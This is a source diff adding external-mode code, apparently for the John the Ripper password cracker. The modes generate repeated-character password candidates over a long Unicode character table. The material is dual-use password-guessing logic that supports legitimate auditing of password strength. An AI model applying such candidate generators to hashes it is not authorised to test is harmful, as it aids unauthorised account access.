+// FE00..FE0F; Variation Selectors
+	c = 0xfe00;		// from VARIATION SELECTOR-1
+	while (c <= 0xfe0f)	// ..to VARIATION SELECTOR-16
+		charset[i++] = c++;
+// FE10..FE1F; Vertical Forms
+	c = 0xfe10;		// from PRESENTATION FORM FOR VERTICAL COMMA
+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+
+/* Zero-terminate it, and cache the first character */
+	charset[maxc = i] = 0;
+
+	length = minlength; c = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i, cl, wl;
+
+	if (target_utf8) {
+		cl = 1;
+		if (charset[c] >= 0x80) {
+			cl++;
+			if (charset[c] >= 0x0800)
+				cl++;
+			wl = length * cl;
+			if (wl > cipher_limit) {
+				c = 0;
+				if (++length > maxlength) {
+					word = 0;
+					return;
+				}
+				cl = 1;
+				if (charset[0] >= 0x80) {
+					cl++;
+					if (charset[0] >= 0x0800)
+						cl++;
+					wl = length * cl;
+					if (wl > cipher_limit) {
+						word = 0;
+						return;
+					}
+				}
+			}
+		}
+	}
+
+	i = 0;
+	while (i < length)
+		word[i++] = charset[c];
+	word[i] = 0;
+
+	if (++c < maxc)
+		return;
+
+	c = 0;
+	if (++length > maxlength)
+		length = 0; // Will NUL out the next "word" and thus terminate
+
+	return;
+}
+
+/* Reset length & c */
+void restore()
+{
+	length = 0;
+
+	while (word[length]) {
+		length++;
+	}
+	c = word[0];
+}
@@ -0,0 +1,2378 @@
+# This software is Copyright (c) 2012-2018 magnum, and it is hereby
+# released to the general public under the following terms:
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted.
+#
+# Try strings of repeated characters, Full Unicode (version 11) version
+#
+# Number of candidates = 137,046 x length
+#
+# Note that these modes will handle --max-len differently than normal: They
+# will consider number of characters as opposed to number of bytes. This
+# means you can naturally just use e.g. --max-len=3 for generating all
+# three-character candidates (which may be up to 12 bytes each).
+#
+# Also note that for UTF-16 formats, the resulting plaintext size within the
+# format will be up to four bytes (two 16-bit words) due to use of surrogates
+# for characters above U+FFFF. This means a format which normally handles up
+# to 27 characters may be limited to only 13 characters, worst case.
+[List.External:Repeats32]
+int minlength, maxlength, maxc, length, c;
+int charset[0x22000];
+
+void init()
+{
+	int i;
+
+	# Trigger UTF-32 handling in External mode
+	utf32 = 1;
+
+	if (req_minlen)
+		minlength = req_minlen;
+	else
+		minlength = 1;
+
+	if (req_maxlen)
+		maxlength = req_maxlen;
+	else
+		maxlength = cipher_limit;
+
+/*
+ * This defines the character set. This is auto-generated from UnicodeData.txt
+ * and we skip control characters.
+ */
+	i = 0;
+// 0000..007F; Basic Latin
+	c = 0x20;		// from SPACE
+	while (c <= 0x7e)	// ..to TILDE
+		charset[i++] = c++;
+// 0080..00FF; Latin-1 Supplement
+	c = 0xa0;		// from NO-BREAK SPACE
+	while (c <= 0xff)	// ..to LATIN SMALL LETTER Y WITH DIAERESIS
+		charset[i++] = c++;
+// 0100..017F; Latin Extended-A
+	c = 0x100;		// from LATIN CAPITAL LETTER A WITH MACRON
+	while (c <= 0x17f)	// ..to LATIN SMALL LETTER LONG S
+		charset[i++] = c++;
+// 0180..024F; Latin Extended-B
+	c = 0x180;		// from LATIN SMALL LETTER B WITH STROKE
+	while (c <= 0x24f)	// ..to LATIN SMALL LETTER Y WITH STROKE
+		charset[i++] = c++;
+// 0250..02AF; IPA Extensions
+	c = 0x250;		// from LATIN SMALL LETTER TURNED A
+	while (c <= 0x2af)	// ..to LATIN SMALL LETTER TURNED H WITH FISHHOOK AND TAIL
+		charset[i++] = c++;
+// 02B0..02FF; Spacing Modifier Letters
+	c = 0x2b0;		// from MODIFIER LETTER SMALL H
+	while (c <= 0x2ff)	// ..to MODIFIER LETTER LOW LEFT ARROW
+		charset[i++] = c++;
+// 0300..036F; Combining Diacritical Marks
+	c = 0x300;		// from COMBINING GRAVE ACCENT
+	while (c <= 0x36f)	// ..to COMBINING LATIN SMALL LETTER X
+		charset[i++] = c++;
+// 0370..03FF; Greek and Coptic
+	c = 0x370;		// from GREEK CAPITAL LETTER HETA
+	while (c <= 0x377)	// ..to GREEK SMALL LETTER PAMPHYLIAN DIGAMMA
+		charset[i++] = c++;
+	c = 0x37a;		// from GREEK YPOGEGRAMMENI
+	while (c <= 0x37f)	// ..to GREEK CAPITAL LETTER YOT
+		charset[i++] = c++;
+	c = 0x384;		// from GREEK TONOS
+	while (c <= 0x38a)	// ..to GREEK CAPITAL LETTER IOTA WITH TONOS
+		charset[i++] = c++;
+	c = 0x38e;		// from GREEK CAPITAL LETTER UPSILON WITH TONOS
+	while (c <= 0x3a1)	// ..to GREEK CAPITAL LETTER RHO
+		charset[i++] = c++;
+	c = 0x3a3;		// from GREEK CAPITAL LETTER SIGMA
+	while (c <= 0x3ff)	// ..to GREEK CAPITAL REVERSED DOTTED LUNATE SIGMA SYMBOL
+		charset[i++] = c++;
+// 0400..04FF; Cyrillic
+	c = 0x400;		// from CYRILLIC CAPITAL LETTER IE WITH GRAVE
+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
